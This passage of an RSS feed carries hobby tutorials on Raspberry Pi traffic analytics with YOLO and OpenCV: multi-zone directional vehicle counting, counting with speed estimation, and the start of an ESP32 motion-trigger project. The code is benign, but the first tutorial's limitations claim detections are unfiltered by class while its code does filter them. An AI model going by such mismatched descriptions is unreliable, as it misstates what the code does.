AI type: Computer Vision – Multi-Zone Counting&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Overview&lt;br /&gt;
&lt;br /&gt;
This project extends basic traffic analytics by using multiple virtual lines&lt;br /&gt;
(zones) and counting vehicles by direction. It enables simple intersection&lt;br /&gt;
analysis using AI on Raspberry Pi, fully offline and without GPUs.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
What you build&lt;br /&gt;
&lt;br /&gt;
- AI vehicle detection on Raspberry Pi&lt;br /&gt;
- Multiple virtual counting lines (zones)&lt;br /&gt;
- Direction-based counting per zone&lt;br /&gt;
- Fully local processing&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Required hardware&lt;br /&gt;
&lt;br /&gt;
- Raspberry Pi 4 or Raspberry Pi 5&lt;br /&gt;
- Camera (USB or Raspberry Pi Camera)&lt;br /&gt;
- microSD card&lt;br /&gt;
- Power supply&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Software requirements&lt;br /&gt;
&lt;br /&gt;
- Raspberry Pi OS&lt;br /&gt;
- Python 3&lt;br /&gt;
- OpenCV&lt;br /&gt;
- Ultralytics YOLO (lightweight model)&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
System architecture&lt;br /&gt;
&lt;br /&gt;
1. Camera captures frames&lt;br /&gt;
2. AI model detects vehicles&lt;br /&gt;
3. Vehicle centers are tracked between frames&lt;br /&gt;
4. Each virtual line (zone) checks crossing direction&lt;br /&gt;
5. Counters are updated per zone and direction&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Installation&lt;br /&gt;
&lt;br /&gt;
sudo apt update&lt;br /&gt;
sudo apt upgrade&lt;br /&gt;
sudo apt install python3-opencv python3-pip&lt;br /&gt;
pip3 install ultralytics&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Zone concept&lt;br /&gt;
&lt;br /&gt;
Each zone is defined by a horizontal line position.&lt;br /&gt;
When a vehicle center crosses a line, the direction&lt;br /&gt;
(up or down) determines which counter is updated.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Python code (copy-paste)&lt;br /&gt;
&lt;br /&gt;
import cv2&lt;br /&gt;
from ultralytics import YOLO&lt;br /&gt;
&lt;br /&gt;
model = YOLO(&amp;quot;yolov8n.pt&amp;quot;)&lt;br /&gt;
cap = cv2.VideoCapture(0)&lt;br /&gt;
&lt;br /&gt;
zones = [200, 300] &amp;nbsp;&amp;nbsp;# Y positions of virtual lines&lt;br /&gt;
prev_y = None&lt;br /&gt;
&lt;br /&gt;
counts = {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;200: {&amp;quot;up&amp;quot;: 0, &amp;quot;down&amp;quot;: 0},&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;300: {&amp;quot;up&amp;quot;: 0, &amp;quot;down&amp;quot;: 0}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
while True:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret, frame = cap.read()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if not ret:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;results = model(frame, verbose=False)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;boxes = results[0].boxes&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# keep only vehicle classes (COCO ids: 2 car, 3 motorcycle, 5 bus, 7 truck)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;vehicles = [b for b in boxes if int(b.cls[0]) in (2, 3, 5, 7)]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if len(vehicles) &amp;gt; 0:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# simplification: track a single vehicle center between frames&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;x1, y1, x2, y2 = vehicles[0].xyxy[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cy = int((y1 + y2) / 2)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if prev_y is not None:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for z in zones:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if prev_y &amp;lt; z and cy &amp;gt;= z:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;counts[z][&amp;quot;down&amp;quot;] += 1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;elif prev_y &amp;gt; z and cy &amp;lt;= z:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;counts[z][&amp;quot;up&amp;quot;] += 1&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;prev_y = cy&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;else:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# reset so a stale center cannot trigger a false crossing&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;prev_y = None&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for z in zones:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.line(frame, (0, z), (frame.shape[1], z), (255, 0, 0), 2)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.putText(frame,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;f&amp;quot;Zone {z} Up:{counts[z][&amp;#039;up&amp;#039;]} Down:{counts[z][&amp;#039;down&amp;#039;]}&amp;quot;,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;(10, z - 10),&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.FONT_HERSHEY_SIMPLEX,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0.5,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;(0, 255, 0),&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;1)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.imshow(&amp;quot;Multi-Zone Traffic AI&amp;quot;, frame)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
cap.release()&lt;br /&gt;
cv2.destroyAllWindows()&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
How it works&lt;br /&gt;
&lt;br /&gt;
The AI model detects vehicles and calculates their vertical center.&lt;br /&gt;
When the center crosses any defined zone line, the direction of movement&lt;br /&gt;
determines whether it is counted as upward or downward traffic.&lt;br /&gt;
&lt;br /&gt;
Each zone maintains independent counters.&lt;br /&gt;
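The crossing rule described above can be isolated as a small pure function (a sketch for illustration; zone_crossings is a hypothetical helper, not part of the script above):

```python
def zone_crossings(prev_y, cy, zones):
    """Return (zone, direction) events for a center that moved from prev_y to cy."""
    events = []
    for z in zones:
        if prev_y < z <= cy:        # center passed the line moving down
            events.append((z, "down"))
        elif prev_y > z >= cy:      # center passed the line moving up
            events.append((z, "up"))
    return events
```

A single large jump between frames can cross several zone lines at once, and this formulation counts each of them.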
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Practical applications&lt;br /&gt;
&lt;br /&gt;
- Intersection traffic analysis&lt;br /&gt;
- Lane-based vehicle flow estimation&lt;br /&gt;
- Smart city traffic prototypes&lt;br /&gt;
- Educational computer vision projects&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Limitations&lt;br /&gt;
&lt;br /&gt;
- Assumes one main vehicle at a time&lt;br /&gt;
- Detections are not filtered by class, so any detected object is counted&lt;br /&gt;
- Occlusions can affect counts&lt;br /&gt;
- A dedicated object tracker would improve accuracy&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Conclusion&lt;br /&gt;
&lt;br /&gt;
Multi-zone traffic analytics demonstrate how Raspberry Pi can handle&lt;br /&gt;
complex AI-based counting tasks without expensive hardware.&lt;br /&gt;
&lt;br /&gt;
By combining simple logic with lightweight AI models, affordable systems&lt;br /&gt;
can deliver useful traffic insights.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/111/multi-traffic-analytics-multiple-lines-directions-raspberry</guid>
<pubDate>Sun, 04 Jan 2026 22:03:49 +0000</pubDate>
</item>
<item>
<title>Simple AI Traffic Analytics (Object Count + Speed) on Raspberry Pi</title>
<link>https://asky.uk/110/simple-ai-traffic-analytics-object-count-speed-on-raspberry</link>
<description>Hardware: Raspberry Pi 4 / Raspberry Pi 5&lt;br /&gt;
AI type: Computer Vision – Traffic Analytics&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Overview&lt;br /&gt;
&lt;br /&gt;
This project combines AI-based object counting and speed estimation to build&lt;br /&gt;
a simple traffic analytics system on Raspberry Pi.&lt;br /&gt;
&lt;br /&gt;
The system detects vehicles, counts them, and estimates their speed using&lt;br /&gt;
camera input and lightweight AI models. Everything runs locally without&lt;br /&gt;
cloud services or GPUs.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
What you build&lt;br /&gt;
&lt;br /&gt;
- Vehicle detection using AI&lt;br /&gt;
- Real-time vehicle counting&lt;br /&gt;
- Approximate speed estimation&lt;br /&gt;
- Fully offline traffic analytics&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Required hardware&lt;br /&gt;
&lt;br /&gt;
- Raspberry Pi 4 or Raspberry Pi 5&lt;br /&gt;
- Camera (USB or Raspberry Pi Camera)&lt;br /&gt;
- microSD card&lt;br /&gt;
- Power supply&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Software requirements&lt;br /&gt;
&lt;br /&gt;
- Raspberry Pi OS&lt;br /&gt;
- Python 3&lt;br /&gt;
- OpenCV&lt;br /&gt;
- Ultralytics YOLO (lightweight model)&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
System architecture&lt;br /&gt;
&lt;br /&gt;
1. Camera captures video frames&lt;br /&gt;
2. AI model detects vehicles&lt;br /&gt;
3. Each detected vehicle is counted&lt;br /&gt;
4. Vehicle movement between frames is tracked&lt;br /&gt;
5. Speed is estimated using distance and time&lt;br /&gt;
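Step 5 boils down to a single formula: speed in meters per second equals the pixel distance divided by the pixels-per-meter scale, divided by the elapsed time. A minimal sketch (the function name is hypothetical):

```python
import math

def estimate_speed_mps(p1, p2, dt_seconds, pixels_per_meter):
    """Convert a pixel displacement between two frames into meters per second."""
    dist_px = math.hypot(p2[0] - p1[0], p2[1] - p1[1])
    return (dist_px / pixels_per_meter) / dt_seconds
```

With a scale of 60 pixels per meter, a center that moves 120 px in one second is travelling roughly 2 m/s.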
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Installation&lt;br /&gt;
&lt;br /&gt;
sudo apt update&lt;br /&gt;
sudo apt upgrade&lt;br /&gt;
sudo apt install python3-opencv python3-pip&lt;br /&gt;
pip3 install ultralytics&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
AI model&lt;br /&gt;
&lt;br /&gt;
A lightweight YOLOv8 Nano model (yolov8n.pt) is used for vehicle detection.&lt;br /&gt;
The model is pre-trained and used only for inference.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Python code (copy-paste)&lt;br /&gt;
&lt;br /&gt;
import cv2&lt;br /&gt;
import time&lt;br /&gt;
import math&lt;br /&gt;
from ultralytics import YOLO&lt;br /&gt;
&lt;br /&gt;
model = YOLO(&amp;quot;yolov8n.pt&amp;quot;)&lt;br /&gt;
cap = cv2.VideoCapture(0)&lt;br /&gt;
&lt;br /&gt;
PIXELS_PER_METER = 60&lt;br /&gt;
prev_positions = {}&lt;br /&gt;
vehicle_id = 0&lt;br /&gt;
counted = set()&lt;br /&gt;
&lt;br /&gt;
while True:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;ret, frame = cap.read()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if not ret:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;results = model(frame, verbose=False)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;boxes = results[0].boxes&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;current_time = time.time()&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;current_positions = {}&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for box in boxes:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;x1, y1, x2, y2 = box.xyxy[0]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cx = int((x1 + x2) / 2)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cy = int((y1 + y2) / 2)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;matched = False&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;for vid, (px, py, pt) in prev_positions.items():&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;dist = math.hypot(cx - px, cy - py)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if dist &amp;lt; 50:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;speed = (dist / PIXELS_PER_METER) / (current_time - pt)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;# overlay the estimated speed near the vehicle center&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.putText(frame, f&amp;quot;{speed:.1f} m/s&amp;quot;, (cx, cy - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 255), 1)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;current_positions[vid] = (cx, cy, current_time)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;matched = True&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if not matched:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;current_positions[vehicle_id] = (cx, cy, current_time)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;counted.add(vehicle_id)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;vehicle_id += 1&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;prev_positions = current_positions&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.putText(frame, f&amp;quot;Vehicles counted: {len(counted)}&amp;quot;,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;(10, 30), cv2.FONT_HERSHEY_SIMPLEX,&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;0.8, (0, 255, 0), 2)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;cv2.imshow(&amp;quot;AI Traffic Analytics&amp;quot;, frame)&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;if cv2.waitKey(1) &amp;amp; 0xFF == 27:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;break&lt;br /&gt;
&lt;br /&gt;
cap.release()&lt;br /&gt;
cv2.destroyAllWindows()&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
How it works&lt;br /&gt;
&lt;br /&gt;
Vehicles are detected using AI and represented by their center point.&lt;br /&gt;
By comparing movement between frames and measuring time differences,&lt;br /&gt;
the system estimates approximate speed.&lt;br /&gt;
&lt;br /&gt;
Counting is performed by assigning each detected vehicle a unique ID.&lt;br /&gt;
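The ID assignment in the loop amounts to greedy nearest-neighbour matching (a sketch; assign_id is a hypothetical name for the inline logic above):

```python
import math

def assign_id(cx, cy, prev_positions, next_id, max_dist=50):
    """Reuse the ID of a previous center within max_dist pixels, else mint a new ID.

    prev_positions maps vehicle_id -> (x, y, timestamp).
    Returns (vehicle_id, next_id, is_new)."""
    for vid, (px, py, _t) in prev_positions.items():
        if math.hypot(cx - px, cy - py) < max_dist:
            return vid, next_id, False
    return next_id, next_id + 1, True
```

Greedy matching keeps the code simple but can swap IDs when two vehicles pass close together, which is why the limitations below apply.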
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Calibration note&lt;br /&gt;
&lt;br /&gt;
The PIXELS_PER_METER value depends on camera position and scene scale.&lt;br /&gt;
It must be adjusted experimentally for realistic speed values.&lt;br /&gt;
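One practical way to calibrate is to measure, in a saved frame, an object whose real-world length is known (a sketch; the 3.5 m lane-marking length is only an example):

```python
def pixels_per_meter(pixel_length, real_length_m):
    """Scale factor derived from a reference object of known length in the frame."""
    return pixel_length / real_length_m

# e.g. a lane marking that spans 210 px on screen and is 3.5 m long in reality
PIXELS_PER_METER = pixels_per_meter(210, 3.5)
```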
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Practical applications&lt;br /&gt;
&lt;br /&gt;
- Traffic flow monitoring&lt;br /&gt;
- Speed trend estimation&lt;br /&gt;
- Smart city prototypes&lt;br /&gt;
- Educational AI projects&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Limitations&lt;br /&gt;
&lt;br /&gt;
- Speed values are approximate&lt;br /&gt;
- Camera angle affects accuracy&lt;br /&gt;
- Not suitable for legal speed enforcement&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Conclusion&lt;br /&gt;
&lt;br /&gt;
This project demonstrates that meaningful traffic analytics can be built&lt;br /&gt;
on Raspberry Pi using AI, without expensive hardware or cloud services.&lt;br /&gt;
&lt;br /&gt;
Affordable hardware combined with smart software design enables&lt;br /&gt;
practical AI solutions.&lt;br /&gt;
&lt;br /&gt;
--------------------------------------------------</description>
<category>AI + Raspberry Pi</category>
<guid isPermaLink="true">https://asky.uk/110/simple-ai-traffic-analytics-object-count-speed-on-raspberry</guid>
<pubDate>Sun, 04 Jan 2026 22:02:11 +0000</pubDate>
</item>
<item>
<title>ESP32 Motion Sensor Trigger → Raspberry Pi AI Vision</title>
<link>https://asky.uk/109/esp32-motion-sensor-trigger-%E2%86%92-raspberry-pi-ai-vision</link>
<description>&lt;p&gt;&lt;img alt="" src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQuByMilKuQhxatpOWvrseefdZS98yis0GbvA&amp;amp;s" style="height:355px; width:632px"&gt;&lt;br&gt;Hardware: ESP32 + Raspberry Pi 4 / 5&lt;br&gt;AI type: Hybrid AI (Sensor Trigger + Computer Vision)&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Overview&lt;br&gt;&lt;br&gt;This project demonstrates a hybrid AI system where an ESP32 with a motion sensor&lt;br&gt;acts as a low-power trigger, while a Raspberry Pi runs AI vision only when motion&lt;br&gt;is detected.&lt;br&gt;&lt;br&gt;This approach saves power and CPU resources by activating AI processing only&lt;br&gt;when needed.&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;What you build&lt;br&gt;&lt;br&gt;- ESP32 motion detection node&lt;br&gt;- Raspberry Pi AI vision system&lt;br&gt;- Wireless trigger via Wi-Fi&lt;br&gt;- Fully local processing&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Required hardware&lt;br&gt;&lt;br&gt;- ESP32 development board&lt;br&gt;- PIR motion sensor (HC-SR501 or compatible)&lt;br&gt;- Raspberry Pi 4 or Raspberry Pi 5&lt;br&gt;- Camera (Pi Camera or USB camera)&lt;br&gt;- Wi-Fi network&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;Software requirements&lt;br&gt;&lt;br&gt;ESP32:&lt;br&gt;- Arduino IDE&lt;br&gt;- WiFi library&lt;br&gt;&lt;br&gt;Raspberry Pi:&lt;br&gt;- Raspberry Pi OS&lt;br&gt;- Python 3&lt;br&gt;- OpenCV&lt;br&gt;- Ultralytics YOLO&lt;br&gt;&lt;br&gt;--------------------------------------------------&lt;br&gt;&lt;br&gt;System architecture&lt;br&gt;&lt;br&gt;1. ESP32 monitors motion using a 